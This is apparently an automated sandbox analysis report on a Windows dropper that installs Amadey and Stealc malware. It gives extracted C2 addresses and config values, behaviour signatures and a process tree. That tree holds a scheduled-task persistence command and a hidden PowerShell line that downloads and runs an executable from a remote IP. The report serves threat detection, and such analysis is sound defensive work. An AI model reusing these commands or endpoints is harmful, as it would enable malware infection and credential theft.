Analysis

  • max time kernel
    143s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-01-2025 19:45

General

  • Target

    721c2d0df508e30dcbb98a0547dd6cea4e5d9a417221e194df7d621f90ff4afe.exe

  • Size

    5.5MB

  • MD5

    aae8af3dba65abddce47f23ba0aa6917

  • SHA1

    0e1209e0ee437fd9dd005e679d109c826f31273e

  • SHA256

    721c2d0df508e30dcbb98a0547dd6cea4e5d9a417221e194df7d621f90ff4afe

  • SHA512

    5432275197b1cd9970e2589079769526f697bfb081f15cc69e6aba87359230ee050c21fc10cb1a3a88475ef382827def1e3855832e6affec3420c11c2ebc0f33

  • SSDEEP

    98304:703zUu6GlCLudVsGdET1W7QF6J/SJgChj+04v4QmM3PxveZcJOFKCT4:7GUu6GlVnsGaUkeqJfs00D/xmZdBT

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

stealc

Botnet

brat

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Checks BIOS information in registry 2 TTPs 12 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 9 IoCs
  • Identifies Wine through registry keys 2 TTPs 6 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 43 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\721c2d0df508e30dcbb98a0547dd6cea4e5d9a417221e194df7d621f90ff4afe.exe
    "C:\Users\Admin\AppData\Local\Temp\721c2d0df508e30dcbb98a0547dd6cea4e5d9a417221e194df7d621f90ff4afe.exe"
    1⤵
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4592
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\r5z58.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\r5z58.exe
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:312
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\p5Y28.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\p5Y28.exe
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4940
        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1i60D2.exe
          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1i60D2.exe
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1456
          • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
            "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:4200
        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2L5613.exe
          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2L5613.exe
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:2644
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3d74i.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3d74i.exe
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        PID:1524
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1524 -s 1568
          4⤵
          • Program crash
          PID:4660
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4J898Q.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4J898Q.exe
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2848
      • C:\Windows\system32\cmd.exe
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3A16.tmp\3A17.tmp\3A18.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4J898Q.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2340
        • C:\Windows\system32\timeout.exe
          timeout /t 2
          4⤵
          • Delays execution with timeout.exe
          PID:4360
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2456
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1892
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2116
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1724
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3492
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1148
        • C:\Windows\system32\schtasks.exe
          schtasks /create /tn "CPpxSma5MlC" /tr "mshta \"C:\Temp\I73Eb8FZX.hta\"" /sc minute /mo 60 /ru "Admin" /f
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:3580
        • C:\Windows\system32\mshta.exe
          mshta "C:\Temp\I73Eb8FZX.hta"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4100
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1688
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1524 -ip 1524
    1⤵
      PID:3516
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      1⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      PID:3096
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      1⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      PID:1636

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Temp\I73Eb8FZX.hta

      Filesize

      796B

      MD5

      a59eb779137c2c4364c86d9e4838abc2

      SHA1

      7bc963e54c2aed1313d5ee4ab6a0d4904e02a664

      SHA256

      2e50bd0045293c0e6939300956d3cbdabcf16634fcb72412f78f65eb9acc76bc

      SHA512

      d847d279e1b006c045674b27129a49aa7c6f6591504b34777e09e690032a7407fca3ac9612f080802023a15dddd92a61eebe5e1b7ecf0b2113e611933ce74c6c

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      2f57fde6b33e89a63cf0dfdd6e60a351

      SHA1

      445bf1b07223a04f8a159581a3d37d630273010f

      SHA256

      3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

      SHA512

      42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      e5bfec1063a497048fffb231a0621403

      SHA1

      97cf6a89f237f43b9c22e3e081f7d45924d435ba

      SHA256

      325d1ffa65e9593a834f3662168d0c1950de148c63f1e43b86727087f3881d6f

      SHA512

      e38c5189054cf09fb15de017d0bbe226338124ee02bb04530943c8fcfc303dbe5fe5fd28c9c1aea1b552d1a2b0b76cabbedd284a38a07d41ec9cf9e55b44dd0e

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      e89c193840c8fb53fc3de104b1c4b092

      SHA1

      8b41b6a392780e48cc33e673cf4412080c42981e

      SHA256

      920b0533da0c372d9d48d36e09d752c369aec8f67c334e98940909bfcb6c0e6c

      SHA512

      865667a22e741c738c62582f0f06ea4559bb63a1f0410065c6fb3da80667582697aba2e233e91068c02d9ab4fb5db282a681fe8234f4c77a5309b689a37ac3a2

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      6846fce1d0992305a22efad76ed9316e

      SHA1

      fd035a44d02066e2ae740559b4c641f310085b21

      SHA256

      f6302ce0f43accb9395cb825af05ce40b45f962057a44c0a5663afcaa9a19295

      SHA512

      3030fd96fab5c353aa12446486914ed3f95e6bfee23f3b5ca5f1c78ee1f5810e2e9a000fe99a3424bd539f8ba2730ba6553224d42635afe0df0734aeb2422bf6

    • C:\Users\Admin\AppData\Local\Temp\3A16.tmp\3A17.tmp\3A18.bat

      Filesize

      2KB

      MD5

      18283422f83c1ac93981ad87b116aaaa

      SHA1

      397308fcc63eef6bdccada1b6bd8ae5d37e81482

      SHA256

      1573a145edf52b446401eea1fdeafcd48b6ecaf3f4bbb4a594a73b921ee02873

      SHA512

      0892532063016e7603f5dec85fbbe3a2aff5c4d0d17079c41ec23640c95c53e27d4bb7f886b4ea79a797db4e9b805cb411996fb0a9c32e5efb1948775388c42e

    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4J898Q.exe

      Filesize

      89KB

      MD5

      8aba5cebefffee288e2b08607e0478fb

      SHA1

      a6c1174636daaf8d1f4c932da5bc76e63f3bbc9b

      SHA256

      649c0e0379f324381e4d2b91d851751ff226caed3257e4d6bc7ab67ddd6a9e15

      SHA512

      8c61e3302e328e06d2c95821d4bf94cd467e856af636f4075ca75a79c13af25492d5c32e79f51f9522af05cb84c15de175787ce9ac0711d8d4d17799c7302693

    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\r5z58.exe

      Filesize

      5.4MB

      MD5

      b8f2a10839ae4c101822ce99609b56be

      SHA1

      2698ed8e7c5703a079ca11436afdf3c102c4fab5

      SHA256

      3650f595ebdbd7de3052f3177af4a472eba6acbc63142a764ed49a379997ab21

      SHA512

      c2fcf89ae935a680d779c98de6dda7248156f3b3aaaf46e8d233cc605d6ecdcf1b0e90945a4c9c3f224f9bd35ad96bbfd9200a3731d2e6d8100aca5f30cbad2c

    • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3d74i.exe

      Filesize

      1.8MB

      MD5

      36c97fee4221becab44a8e2a0cd26271

      SHA1

      1f0c71bac470518971af2d60012d7710f3f35dc3

      SHA256

      1cb5a19ee0b31b54658358590067ef7a2ff6aa066383c75754ca8df7a8a194cf

      SHA512

      b60b0d022614ebbbaea0a3047b20b7f8361d7720cd087aea6e9272bdbaedb961b8b19997d35bc6bb4fc97ac200226791d45d8fe48a81a41563e82f83d7ac87f5

    • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\p5Y28.exe

      Filesize

      3.6MB

      MD5

      91fb24ee1fb13a1df07677e897a15a4f

      SHA1

      b05ba036c50664e3e6da140299716802b43b126f

      SHA256

      8c264b96b7fc43bb2523d90df8aa8afbb85c3b235b0803f0e22b4d6049829fae

      SHA512

      634048ba44583c14b42db9a44104f1a3dbacdeff6ab1110138f2aaf981b4f76c336fdb82f42946cec09327648cf76ce97cfaba9413a0ec03301bab8ddfbdf79e

    • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1i60D2.exe

      Filesize

      1.8MB

      MD5

      aa166f9ed8f9b5823d50c2fe02367bf2

      SHA1

      bb03bcdc831d1f152d755a782c404519ded70330

      SHA256

      dda545668e2e77f90ce6c09a9f444ec0a8f0f68bddf6ed3269ecf2893fdcdffa

      SHA512

      15c552c88b72fddc11576317026d4c532b891e47646c11949f5407e8e10e92c62c057c843f340289fa466222f526bef26d8532316f06602cc7d5dea77a5131cf

    • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2L5613.exe

      Filesize

      3.0MB

      MD5

      ac4196b138f3ab014f658651b94ce6be

      SHA1

      5915e3eaab9bedaa85f2e9bb81f921e857f227c0

      SHA256

      3486792d7957d0078213b74146b3a1157e27465dd07f1d5496402bc9039cc60c

      SHA512

      c826c13df14e6329c8e6a7b1937f3a71582a02aa9d9a490695fca53f4fe9f607c94c44f233eca4c842bab0e3554ae57de91bffbdfcffcd3b859eb3863708b4af

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0pztwyq3.nlf.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/1456-34-0x0000000000340000-0x00000000007FE000-memory.dmp

      Filesize

      4.7MB

    • memory/1456-21-0x0000000000340000-0x00000000007FE000-memory.dmp

      Filesize

      4.7MB

    • memory/1524-44-0x0000000000140000-0x00000000007F3000-memory.dmp

      Filesize

      6.7MB

    • memory/1524-51-0x0000000000140000-0x00000000007F3000-memory.dmp

      Filesize

      6.7MB

    • memory/1524-49-0x0000000000140000-0x00000000007F3000-memory.dmp

      Filesize

      6.7MB

    • memory/1524-47-0x0000000000140000-0x00000000007F3000-memory.dmp

      Filesize

      6.7MB

    • memory/1636-119-0x0000000000530000-0x00000000009EE000-memory.dmp

      Filesize

      4.7MB

    • memory/1636-117-0x0000000000530000-0x00000000009EE000-memory.dmp

      Filesize

      4.7MB

    • memory/1892-66-0x000001EB3C0F0000-0x000001EB3C112000-memory.dmp

      Filesize

      136KB

    • memory/2644-40-0x0000000000210000-0x000000000050E000-memory.dmp

      Filesize

      3.0MB

    • memory/2644-39-0x0000000000210000-0x000000000050E000-memory.dmp

      Filesize

      3.0MB

    • memory/3096-107-0x0000000000530000-0x00000000009EE000-memory.dmp

      Filesize

      4.7MB

    • memory/3096-108-0x0000000000530000-0x00000000009EE000-memory.dmp

      Filesize

      4.7MB

    • memory/4200-46-0x0000000000530000-0x00000000009EE000-memory.dmp

      Filesize

      4.7MB

    • memory/4200-113-0x0000000000530000-0x00000000009EE000-memory.dmp

      Filesize

      4.7MB

    • memory/4200-35-0x0000000000530000-0x00000000009EE000-memory.dmp

      Filesize

      4.7MB

    • memory/4200-45-0x0000000000530000-0x00000000009EE000-memory.dmp

      Filesize

      4.7MB

    • memory/4200-109-0x0000000000530000-0x00000000009EE000-memory.dmp

      Filesize

      4.7MB

    • memory/4200-110-0x0000000000530000-0x00000000009EE000-memory.dmp

      Filesize

      4.7MB

    • memory/4200-112-0x0000000000530000-0x00000000009EE000-memory.dmp

      Filesize

      4.7MB

    • memory/4200-104-0x0000000000530000-0x00000000009EE000-memory.dmp

      Filesize

      4.7MB

    • memory/4200-114-0x0000000000530000-0x00000000009EE000-memory.dmp

      Filesize

      4.7MB

    • memory/4200-115-0x0000000000530000-0x00000000009EE000-memory.dmp

      Filesize

      4.7MB

    • memory/4200-50-0x0000000000530000-0x00000000009EE000-memory.dmp

      Filesize

      4.7MB

    • memory/4200-48-0x0000000000530000-0x00000000009EE000-memory.dmp

      Filesize

      4.7MB

    • memory/4200-120-0x0000000000530000-0x00000000009EE000-memory.dmp

      Filesize

      4.7MB

    • memory/4200-121-0x0000000000530000-0x00000000009EE000-memory.dmp

      Filesize

      4.7MB

    • memory/4200-122-0x0000000000530000-0x00000000009EE000-memory.dmp

      Filesize

      4.7MB

    • memory/4200-123-0x0000000000530000-0x00000000009EE000-memory.dmp

      Filesize

      4.7MB